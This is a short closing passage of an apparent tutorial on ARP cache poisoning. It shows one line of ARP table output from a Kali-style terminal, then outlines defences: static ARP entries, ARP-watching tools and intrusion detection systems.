? (192.168.122.158) at e6:e4:e4:95:1e:27 [ether] on wlan0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$              

To defend ARP poisoning attacks one could on one side use static ARP entries, but those could get overwritten by received ARP responses depending on the ARP handling code of the operating system on the other side one could use a tool such as ARP watcher).  

ARP watcher keeps an eye on the ARP traffic and reports suspicious behavior but will not prevent it. Nowadays most modern Intrusion Detection Systems can detect ARP cache poisoning attacks. You should check the
functionality of your IDS by using the above scripts to see how it behaves.

 

To be Continued......

Disclaimer